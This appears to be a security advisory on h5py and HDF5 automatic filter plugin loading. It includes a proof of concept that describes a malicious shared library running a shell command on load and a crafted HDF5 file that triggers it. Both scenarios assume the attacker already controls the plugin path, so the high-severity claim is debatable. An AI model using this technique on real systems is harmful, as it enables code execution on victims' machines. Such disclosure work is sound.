| # Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py |
|
|
| ## Target |
| - **Project:** h5py/h5py |
| - **URL:** https://github.com/h5py/h5py |
| - **Component:** HDF5 filter pipeline / dataset read path |
| - **CWE:** CWE-94 (Improper Control of Generation of Code / Code Injection) |
|
|
| ## Severity: HIGH |
|
|
| ## Summary |
|
|
| When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared library (`.so`/`.dll`) filter plugin from directories in the plugin search path. h5py exposes APIs (`h5py.h5pl`) to manipulate this search path but does **nothing** to restrict or disable this automatic dynamic loading behavior. A crafted HDF5 file specifying a custom filter ID will cause HDF5 to load and execute arbitrary code from a shared library placed in the plugin search path -- which can be controlled via the `HDF5_PLUGIN_PATH` environment variable or through the `h5py.h5pl.append()`/`prepend()` APIs. |
|
|
| ## Vulnerable Code |
|
|
| ### File: `h5py/h5py/h5z.pyx` (lines 102-121) |
|
|
| ```python |
| @with_phil |
| def register_filter(uintptr_t cls_pointer_address): |
| '''(INT cls_pointer_address) => BOOL |
| |
| Register a new filter from the memory address of a buffer containing a |
| ``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter. |
| |
| `cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic |
| library:: |
| |
| import ctypes |
| |
| filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so") |
| filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p |
| |
| h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info()) |
| |
| ''' |
| return <int>H5Zregister(<const void *>cls_pointer_address) >= 0 |
| ``` |
|
|
| ### File: `h5py/h5py/h5pl.pyx` (lines 20-25) |
|
|
| ```python |
| cpdef append(const char* search_path): |
| """(STRING search_path) |
| Add a directory to the end of the plugin search path. |
| """ |
| H5PLappend(search_path) |
| ``` |
|
|
| ### File: `h5py/h5py/_hl/filters.py` (lines 295-299) |
| |
| When a dataset is created with an integer filter ID, h5py passes it directly to HDF5: |
| ```python |
| elif isinstance(compression, int): |
| if not allow_unknown_filter and not h5z.filter_avail(compression): |
| raise ValueError("Unknown compression filter number: %s" % compression) |
| plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts) |
| ``` |
| |
| ### Automatic Plugin Loading (HDF5 library behavior) |
|
|
| When `H5Dread()` is called on a dataset with a filter ID that is not currently registered, HDF5 searches the plugin path for `.so`/`.dll` files, loads them via `dlopen()`, calls `H5PLget_plugin_info()` to obtain the filter class, and registers it automatically. This happens transparently inside: |
|
|
| - `h5py/h5py/_proxy.templ.pyx` line 120: `H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)` |
| - `h5py/h5py/_proxy.templ.pyx` line 151: `H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)` |
|
|
| ## Exploitation |
|
|
| ### Attack Scenario 1: Crafted HDF5 file + environment manipulation |
|
|
| 1. An attacker sets `HDF5_PLUGIN_PATH` to a directory they control (e.g., via `.bashrc` manipulation, Docker environment, or CI/CD configuration) |
| 2. They place a malicious `.so` file in that directory implementing the `H5PLget_plugin_info` symbol |
| 3. They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin |
| 4. When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes |
|
|
| ### Attack Scenario 2: h5pl API abuse in shared environments |
|
|
| In applications where users can influence the plugin path via `h5py.h5pl.append()` before file loading: |
|
|
| ```python |
| import h5py |
| |
| # Attacker injects malicious plugin path |
| h5py.h5pl.append(b'/attacker/controlled/path') |
| |
| # Later, when legitimate code reads a crafted HDF5 file: |
| with h5py.File('crafted.h5', 'r') as f: |
| data = f['dataset'][:] # Triggers plugin loading -> RCE |
| ``` |
|
|
| ### Proof of Concept |
|
|
| ```python |
| import h5py |
| import numpy as np |
| import struct |
| import tempfile |
| import os |
| |
| # Step 1: Create a malicious shared library (filter plugin) |
| # In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code |
| # For demonstration, this would be: |
| # gcc -shared -o malicious_filter.so -fPIC malicious_filter.c |
| # Where malicious_filter.c contains: |
| # #include <stdlib.h> |
| # void __attribute__((constructor)) init() { system("id > /tmp/pwned"); } |
| |
| # Step 2: Set plugin path |
| os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins' |
| |
| # Step 3: Create HDF5 file with custom filter |
| CUSTOM_FILTER_ID = 32000 # Use a non-standard filter ID |
| |
| with h5py.File('/tmp/crafted.h5', 'w') as f: |
| # Use allow_unknown_filter to bypass availability check during creation |
| f.create_dataset( |
| 'payload', |
| data=np.zeros(100), |
| compression=CUSTOM_FILTER_ID, |
| compression_opts=(0,), |
| chunks=(100,), |
| allow_unknown_filter=True |
| ) |
| |
| # Step 4: When any user reads this file, the filter plugin is loaded |
| with h5py.File('/tmp/crafted.h5', 'r') as f: |
| data = f['payload'][:] # This triggers automatic plugin search and dlopen() |
| ``` |
|
|
| ## Impact |
|
|
| - **Arbitrary code execution** in the context of the process reading the HDF5 file |
| - This is particularly dangerous in: |
| - Data science pipelines that process untrusted HDF5 files |
| - ML model loading (Keras/TensorFlow models are stored as HDF5) |
| - Scientific data sharing workflows |
| - Jupyter notebook environments processing external data |
| - h5py provides no mechanism to disable automatic filter plugin loading |
| - The `allow_unknown_filter=True` parameter on dataset creation is designed for this workflow, explicitly supporting the use case |
|
|
| ## Remediation |
|
|
| 1. **Provide an option to disable automatic filter plugin loading** when opening files for reading. HDF5 1.10+ supports `H5PLset_loading_state()` to disable plugin loading. |
| 2. **Add a security warning** in documentation about the risks of processing untrusted HDF5 files |
| 3. **Consider defaulting to disabled plugin loading** for read-only file access, requiring explicit opt-in |
| 4. **Validate or restrict plugin paths** added via `h5pl.append()`/`prepend()` |
|
|
| ## References |
|
|
| - HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html |
| - HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins |
| - h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline |
| |